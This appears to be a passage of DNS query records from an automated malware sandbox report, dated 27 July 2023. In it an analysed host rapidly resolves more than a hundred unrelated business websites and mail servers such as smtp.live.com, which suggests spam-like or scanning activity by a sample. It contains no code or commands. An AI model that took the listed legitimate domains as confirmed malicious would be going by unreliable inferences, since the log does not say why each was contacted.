                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.450216055 CEST8.8.8.8192.168.2.40x5366No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.859507084 CEST8.8.8.8192.168.2.40xb425No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.859507084 CEST8.8.8.8192.168.2.40xb425No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.859507084 CEST8.8.8.8192.168.2.40xb425No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.614217043 CEST8.8.8.8192.168.2.40x7a7fNo error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.995512009 CEST8.8.8.8192.168.2.40x6608No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.410646915 CEST8.8.8.8192.168.2.40x83dfNo error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.453726053 CEST8.8.8.8192.168.2.40x34cNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.453726053 CEST8.8.8.8192.168.2.40x34cNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.961189032 CEST8.8.8.8192.168.2.40x1af2No error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.961189032 CEST8.8.8.8192.168.2.40x1af2No error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.020725012 CEST8.8.8.8192.168.2.40x184eNo error (0)www.dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.020725012 CEST8.8.8.8192.168.2.40x184eNo error (0)www.dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.465235949 CEST8.8.8.8192.168.2.40xbf53No error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.465235949 CEST8.8.8.8192.168.2.40xbf53No error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.602835894 CEST8.8.8.8192.168.2.40x4b28No error (0)www.x0c.com104.143.9.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.602835894 CEST8.8.8.8192.168.2.40x4b28No error (0)www.x0c.com104.143.9.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.728111029 CEST8.8.8.8192.168.2.40x9532No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.091258049 CEST8.8.8.8192.168.2.40xf69eNo error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.284393072 CEST8.8.8.8192.168.2.40xe5e7Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.324594021 CEST8.8.8.8192.168.2.40x4977No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.415676117 CEST8.8.8.8192.168.2.40xc27dNo error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.979983091 CEST8.8.8.8192.168.2.40xe4e4No error (0)www.railbook.net103.224.212.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:50.152314901 CEST8.8.8.8192.168.2.40xea2No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:50.375305891 CEST8.8.8.8192.168.2.40xa9d7No error (0)www.tc17.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:50.375305891 CEST8.8.8.8192.168.2.40xa9d7No error (0)www.tc17.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.928066969 CEST8.8.8.8192.168.2.40x8ff5No error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.929799080 CEST8.8.8.8192.168.2.40x6fa1No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.929799080 CEST8.8.8.8192.168.2.40x6fa1No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.930144072 CEST8.8.8.8192.168.2.40x422cNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.930144072 CEST8.8.8.8192.168.2.40x422cNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.943291903 CEST8.8.8.8192.168.2.40xf632No error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.943291903 CEST8.8.8.8192.168.2.40xf632No error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.951661110 CEST8.8.8.8192.168.2.40x7f89No error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.951661110 CEST8.8.8.8192.168.2.40x7f89No error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.960841894 CEST8.8.8.8192.168.2.40x2608No error (0)www.pdqhomes.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.960841894 CEST8.8.8.8192.168.2.40x2608No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.960841894 CEST8.8.8.8192.168.2.40x2608No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.960841894 CEST8.8.8.8192.168.2.40x2608No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.979114056 CEST8.8.8.8192.168.2.40x6309No error (0)www.ftchat.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.979114056 CEST8.8.8.8192.168.2.40x6309No error (0)www.ftchat.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.984343052 CEST8.8.8.8192.168.2.40x94beNo error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:54.984343052 CEST8.8.8.8192.168.2.40x94beNo error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.000703096 CEST8.8.8.8192.168.2.40xec3dNo error (0)www.wkhk.net206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.160702944 CEST8.8.8.8192.168.2.40x9427No error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.331115007 CEST8.8.8.8192.168.2.40x9d52No error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.331115007 CEST8.8.8.8192.168.2.40x9d52No error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.331115007 CEST8.8.8.8192.168.2.40x9d52No error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.344384909 CEST8.8.8.8192.168.2.40x7c4eNo error (0)www.alteor.clcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.344384909 CEST8.8.8.8192.168.2.40x7c4eNo error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.344384909 CEST8.8.8.8192.168.2.40x7c4eNo error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.353072882 CEST8.8.8.8192.168.2.40x4a33No error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.353072882 CEST8.8.8.8192.168.2.40x4a33No error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.353072882 CEST8.8.8.8192.168.2.40x4a33No error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.613224983 CEST8.8.8.8192.168.2.40xf2fbNo error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.781255960 CEST8.8.8.8192.168.2.40x7766No error (0)www.rs-ag.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.781255960 CEST8.8.8.8192.168.2.40x7766No error (0)www.rs-ag.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.840501070 CEST8.8.8.8192.168.2.40xaf4bNo error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.840501070 CEST8.8.8.8192.168.2.40xaf4bNo error (0)ghs.googlehosted.com172.217.16.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.859004021 CEST8.8.8.8192.168.2.40xc673No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.859004021 CEST8.8.8.8192.168.2.40xc673No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.859004021 CEST8.8.8.8192.168.2.40xc673No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.873296022 CEST8.8.8.8192.168.2.40x8aeNo error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.873296022 CEST8.8.8.8192.168.2.40x8aeNo error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:55.960407972 CEST8.8.8.8192.168.2.40x2872No error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.009320021 CEST8.8.8.8192.168.2.40xf549Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.159169912 CEST8.8.8.8192.168.2.40x3445No error (0)www.petsfan.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.159169912 CEST8.8.8.8192.168.2.40x3445No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.159169912 CEST8.8.8.8192.168.2.40x3445No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.159169912 CEST8.8.8.8192.168.2.40x3445No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.256480932 CEST8.8.8.8192.168.2.40x1e13No error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.257117033 CEST8.8.8.8192.168.2.40xbeccNo error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.257117033 CEST8.8.8.8192.168.2.40xbeccNo error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.271447897 CEST8.8.8.8192.168.2.40xd0dbNo error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.421268940 CEST8.8.8.8192.168.2.40xfe8dNo error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.421268940 CEST8.8.8.8192.168.2.40xfe8dNo error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.516078949 CEST8.8.8.8192.168.2.40xaff6No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.516078949 CEST8.8.8.8192.168.2.40xaff6No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.516078949 CEST8.8.8.8192.168.2.40xaff6No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.600784063 CEST8.8.8.8192.168.2.40xd239Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.604639053 CEST8.8.8.8192.168.2.40x8a0bNo error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.604639053 CEST8.8.8.8192.168.2.40x8a0bNo error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.604639053 CEST8.8.8.8192.168.2.40x8a0bNo error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.660471916 CEST8.8.8.8192.168.2.40x1a1aNo error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.660471916 CEST8.8.8.8192.168.2.40x1a1aNo error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.706362963 CEST8.8.8.8192.168.2.40x675eNo error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.706362963 CEST8.8.8.8192.168.2.40x675eNo error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.886679888 CEST8.8.8.8192.168.2.40xc846No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.886679888 CEST8.8.8.8192.168.2.40xc846No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.031831980 CEST8.8.8.8192.168.2.40x8d8fNo error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.076792002 CEST8.8.8.8192.168.2.40x4b6fNo error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.076792002 CEST8.8.8.8192.168.2.40x4b6fNo error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.078773022 CEST8.8.8.8192.168.2.40x70c3No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.078773022 CEST8.8.8.8192.168.2.40x70c3No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.090770006 CEST8.8.8.8192.168.2.40xf9fbNo error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.090770006 CEST8.8.8.8192.168.2.40xf9fbNo error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.099313974 CEST8.8.8.8192.168.2.40xa045No error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.485804081 CEST8.8.8.8192.168.2.40xfdd7No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.485804081 CEST8.8.8.8192.168.2.40xfdd7No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.524575949 CEST8.8.8.8192.168.2.40xa4aNo error (0)www.cokocoko.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.524575949 CEST8.8.8.8192.168.2.40xa4aNo error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.524575949 CEST8.8.8.8192.168.2.40xa4aNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.524575949 CEST8.8.8.8192.168.2.40xa4aNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.628356934 CEST8.8.8.8192.168.2.40x2e43No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.628356934 CEST8.8.8.8192.168.2.40x2e43No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.103424072 CEST8.8.8.8192.168.2.40x6cfNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.120055914 CEST8.8.8.8192.168.2.40xbb2cNo error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.132874966 CEST8.8.8.8192.168.2.40x54aNo error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.132874966 CEST8.8.8.8192.168.2.40x54aNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.132874966 CEST8.8.8.8192.168.2.40x54aNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.174453974 CEST8.8.8.8192.168.2.40x5722Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.220395088 CEST8.8.8.8192.168.2.40xffdeNo error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.220395088 CEST8.8.8.8192.168.2.40xffdeNo error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.361068964 CEST8.8.8.8192.168.2.40xea16No error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.488114119 CEST8.8.8.8192.168.2.40x480fNo error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.510876894 CEST8.8.8.8192.168.2.40xd930No error (0)www.wifi4all.nl188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.510876894 CEST8.8.8.8192.168.2.40xd930No error (0)www.wifi4all.nl188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.775667906 CEST8.8.8.8192.168.2.40xc38No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.996823072 CEST8.8.8.8192.168.2.40xc47dNo error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.020889997 CEST8.8.8.8192.168.2.40x57ddNo error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.066844940 CEST8.8.8.8192.168.2.40x7aedNo error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.089900970 CEST8.8.8.8192.168.2.40xded0No error (0)www.fcwcvt.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.089900970 CEST8.8.8.8192.168.2.40xded0No error (0)www.fcwcvt.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.101515055 CEST8.8.8.8192.168.2.40x2ffaNo error (0)www.netcr.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.101515055 CEST8.8.8.8192.168.2.40x2ffaNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.101515055 CEST8.8.8.8192.168.2.40x2ffaNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.101515055 CEST8.8.8.8192.168.2.40x2ffaNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.392673016 CEST8.8.8.8192.168.2.40x4fb8No error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.392673016 CEST8.8.8.8192.168.2.40x4fb8No error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.770307064 CEST8.8.8.8192.168.2.40x584bNo error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.770307064 CEST8.8.8.8192.168.2.40x584bNo error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.877851009 CEST8.8.8.8192.168.2.40x9132No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.390193939 CEST8.8.8.8192.168.2.40x81d5No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.392507076 CEST8.8.8.8192.168.2.40x4573No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.395128965 CEST8.8.8.8192.168.2.40xd904No error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.448964119 CEST8.8.8.8192.168.2.40x8c5dNo error (0)www.snugpak.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.448964119 CEST8.8.8.8192.168.2.40x8c5dNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.478672981 CEST8.8.8.8192.168.2.40x1f50No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.478672981 CEST8.8.8.8192.168.2.40x1f50No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.478672981 CEST8.8.8.8192.168.2.40x1f50No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.478672981 CEST8.8.8.8192.168.2.40x1f50No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.478672981 CEST8.8.8.8192.168.2.40x1f50No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.478672981 CEST8.8.8.8192.168.2.40x1f50No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.018368959 CEST8.8.8.8192.168.2.40x232bNo error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.018368959 CEST8.8.8.8192.168.2.40x232bNo error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.019129992 CEST8.8.8.8192.168.2.40x35a2No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.019129992 CEST8.8.8.8192.168.2.40x35a2No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.022614956 CEST8.8.8.8192.168.2.40x3fcfNo error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.033792973 CEST8.8.8.8192.168.2.40x5da3No error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.042464018 CEST8.8.8.8192.168.2.40x933bNo error (0)www.wkhk.net206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.047127962 CEST8.8.8.8192.168.2.40x4b04No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.047127962 CEST8.8.8.8192.168.2.40x4b04No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
